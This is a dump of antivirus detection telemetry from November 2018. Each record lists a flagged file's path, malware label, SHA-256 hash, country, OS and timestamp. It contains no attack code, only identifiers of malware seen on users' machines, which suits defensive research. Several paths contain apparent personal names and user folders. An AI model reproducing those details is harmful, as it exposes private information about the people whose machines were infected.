  Row(detection=Row(filename='avscan-20181104-183904-3389c76e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2e796d00\\AVSCAN-20181104-183723-2027BD5B\\AVSCAN-20181104-183904-3389C76E', filesize=704000, name='TR/AD.MalwareCrypter.26914c.#M1.#R1'), hash='26914cb2067b76cbd2431ee75f9fdd3aed27304c4cafaf9789a391e8f08b5d3f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:39:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='s0017mdfl.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Boxs Cracked 2015-2016\\AutoPlay\\Docs\\Miracle Falcon Box\\Bin\\s0017mdfl.dll', filesize=4992000, name='DR/Delphi.Gen.#M300.#R491'), hash='6effd6351227497ea1e1d697792f0b7050faf5fc051144d52122171fc9a84a0e', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:41:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131749-3500c3cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131749-3500C3CC', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:17:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T10:13:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131808-368147c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131808-368147C4', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:18:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-052610-7110e580', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0e998ad2\\AVSCAN-20181104-052500-68EBF75D\\AVSCAN-20181104-052610-7110E580', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T02:26:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T17:26:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131656-3103f425', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-131656-3103F425', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:16:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T12:10:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered donad', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered donad', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='25d15dfae56e82fc98d308f15accee6c3d6dbc5e04c9a7dab5fa50c57e75ded5', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:40:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='atube_catcher_2501613937.exe', filepath='c:\\users\\X\\downloads\\aTube_Catcher_2501613937.exe', filesize=2460000, name='PUA/InstallCore.#M1.#R1'), hash='62baa352039830f5fd30eb37497b849a646d678db29466333ac2a0c43fdda658', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:51:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001e837', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001e837', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:18:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:54:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-183601-1f72c7e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_704638ed\\AVSCAN-20181104-183537-1B8D8D49\\AVSCAN-20181104-183601-1F72C7E8', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:35:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-121411-3e1e5c79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24c2bae8\\AVSCAN-20181104-121126-1AF5F320\\AVSCAN-20181104-121411-3E1E5C79', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:56:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b30fc1da44f97eef2d06c983b312bb6d308fe531', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\b30fc1da44f97eef2d06c983b312bb6d308fe531', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='8cc70b959feaba7fd476ea357e2da573e4e43c6eca7e5712210717e30d742ccf', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:32:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-224131-5b1d7ebe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4cb734e8\\AVSCAN-20181104-224118-5886B78D\\AVSCAN-20181104-224131-5B1D7EBE', filesize=14208000, name='TR/CoinMiner.593149.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T22:41:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='webapphost.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsa29F4.tmp\\webapphost.dll', filesize=756000, name='PUA/SearchProtect.Gen.#M300.#R6215'), hash='65b7afa0c263db4e3ff726247d5864ae4463c7618bd9756e486a2c206e97c09f', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\veohtv_13717.exe', parentsize=992632, timestamp='2018-11-04T21:08:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001ec65', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001ec65', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:19:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001f184', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001f184', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:21:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130709-04a86296', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130336-F49E60EB\\AVSCAN-20181104-130709-04A86296', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:07:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='blocada_kh_v15.exe', filepath='C:\\Users\\X\\Saved Games\\Blocada_KH_v15.exe', filesize=9344000, name='TR/Spy.Banker.Gen4.#M300.#R100338'), hash='9cd534d450db8b6b053240cd6d16cb3e3daefd32527d50b8f6ec0866934397c6', metadata=Row(cmdline='\\\\\\/increment', country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\aitagent.exe', parentsize=None, timestamp='2018-11-04T14:01:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T19:16:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ileabdr.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\ileabdr.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0ac45a35416b98986da19fbfe9542725de6640c87b34ba80ba68873a7bdde409', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:15:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ilttrptc.exe', filepath='C:\\Windows\\SysWOW64\\lvljrgea\\ilttrptc.exe', filesize=15232000, name='TR/Crypt.XPACK.iypne.#M1.#R1'), hash='40234587da856a9a760f4ff824c17eb1da20ee23d69200da8a3b489a39d0ae72', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\SysWOW64\\svchost.exe', parentsize=44520, timestamp='2018-11-04T11:14:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-220934-613ac257', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_70e1c465\\AVSCAN-20181104-214728-EDBACF48\\AVSCAN-20181104-220934-613AC257', filesize=492000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='501f415c7c26299c4f6ab9c79bda7a060ee8f308886e0cadbbadf47036951df3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T15:09:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000014c', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp0000014c', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T13:58:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nst10A8.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T02:44:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151638-21e2034e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_368129bd\\AVSCAN-20181104-150834-EF41BAD7\\AVSCAN-20181104-151638-21E2034E', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='689f8d95752084794c09edc4d7e50c7347428fee74c9a37327343f1a517cdcd6', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:16:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:36:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='be9ce919164d833c2690a8db378dd49422ed4a621524407fcf853da3992e59bd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\BE9CE919164D833C2690A8DB378DD49422ED4A621524407FCF853DA3992E59BD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='be9ce919164d833c2690a8db378dd49422ed4a621524407fcf853da3992e59bd', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:08:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:44:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lg_p710_es.htm', filepath='C:\\Program Files (x86)\\Octoplus\\Octoplus_LG\\MANUALS\\LG_P710_ES.htm', filesize=384000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='467169df66f73856c5e0ed2b0ef14608033c71496b3e36be1cccdc0f874c5c08', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=677024, timestamp='2018-11-04T19:21:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fwdl.exe', filepath='C:\\Users\\X\\Desktop\\SEHAM (E)\\my bag\\hp 1000\\Italiano\\fwdl.exe', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='d753cf36bb71429a89bba8233db998fb62cc290b1b96f31aa288368410c8b03c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:soLHGKO7PUC+6wrj.1', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-04T09:15:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-184925-a722def8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a5849ba8\\AVSCAN-20181104-172709-DA7A2B0A\\AVSCAN-20181104-184925-A722DEF8', filesize=256000, name='TR/Qadars.DV.#M1.#R1'), hash='bda35141854d6ab62fe8bac8c978b01b9249fc6486e7ce76a43363dee1a6d294', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:49:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='0c08bca7a4b89869bfad60fbe70a1a6b319a2f21', filepath='C:\\Users\\X\\AppData\\Roaming\\Apple Computer\\MobileSync\\Backup\\7ae31f6cc9795fd2a07cdede1da8b3c615ad2198\\Snapshot\\0c\\0c08bca7a4b89869bfad60fbe70a1a6b319a2f21', filesize=8000, name='HEUR/Suspar.Gen.#M1.#R1'), hash='c631e34853300c094c5bac5c053ce94c5f390be817cca0813fc677f1f123291d', metadata=Row(cmdline='--pipe \\\\\\\\\\\\\\\\.\\\\\\\\pipe\\\\\\\\307005302051464672418176', country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Common Files\\Apple\\Mobile Device Support\\AppleMobileBackup.exe', parentsize=67896, timestamp='2018-11-04T04:04:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hoftdtrn.exe', filepath='\\?\\N:\\مصارعة\\العااااااااااب\\بيت الرعب\\HOFTDTRN.EXE', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='244674a8102c5dbe45ff81b96658cf90e1534a7c38d57ca68d138f17f388b392', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:40:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:41:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150429-da318f75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1d213554\\AVSCAN-20181104-150127-CF95D00D\\AVSCAN-20181104-150429-DA318F75', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:04:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hopinst.exe', filepath='C:\\Program Files (x86)\\interhpx_00000001\\HopInst.exe', filesize=192000, name='Adware/ELEX.umebz.#M1.#R1'), hash='bf33a2fa1417e9e761302b0d0f29c355a3841a18117dadb6085389763bbf5f4d', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:20:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-121745-50d82781', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_364e103e\\AVSCAN-20181104-121610-422C33EE\\AVSCAN-20181104-121745-50D82781', filesize=372000, name='TR/Trash.Gen.#M1.#R1'), hash='bcac16c5541da822a60e6eb356604c9894322094bf237a8b609cde8902e25cec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:17:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225131-5586a8da', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_769529c4\\AVSCAN-20181104-225122-53DF0966\\AVSCAN-20181104-225131-5586A8DA', filesize=640000, name='HEUR/AGEN.1010682.#M1.#R1'), hash='b5c2ef0cbf4c3e853cd7a085b6e257ad5af810f172b9b3f91bf8cbe068db4423', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:51:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\awdhc5wnku1\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T05:21:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T11:48:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='\\\\?\\D:\\DATA\\Documents\\solid works\\swwi\\lang\\german\\setup.exe', filesize=1280000, name='W32/Sality.AT.#M1.#R1'), hash='806af473295f069066f341d547c9f284c694e260c12ae7c6e76de622e6993c28', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:38:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='imenubar.dll', filepath='C:\\Microgaming\\Poker\\redstarpoker\\control\\imenubar.dll', filesize=96000, name='GAME/Casino.Gen.#M1.#R1'), hash='9c70d52c17032f3c08a6e64a275519c7b90ed07895fad1a80b47ec5ff57ca95f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Microgaming\\Poker\\redstarpoker\\mppoker.exe', parentsize=1214712, timestamp='2018-11-02T20:37:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:51:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:40:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M0.#R0'), hash='dc526dc7551d08e62cd8cf1926b56c34474af1f80a470e8f623d9b8428c70c6f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:01:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qmxyejtx.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\qmxYEjTx.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:35:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\OUTLANDER\\OUTLANDER MY17\\TOOL\\VISTAMSV\\ENV\\VISTAMSVE\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='96b37cba1c648602266521f9fed2c4433a2dcb3851e525781a107bf4ad5616d6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:07:20Z'), dt=datetime.date(2018, 11, 2)),
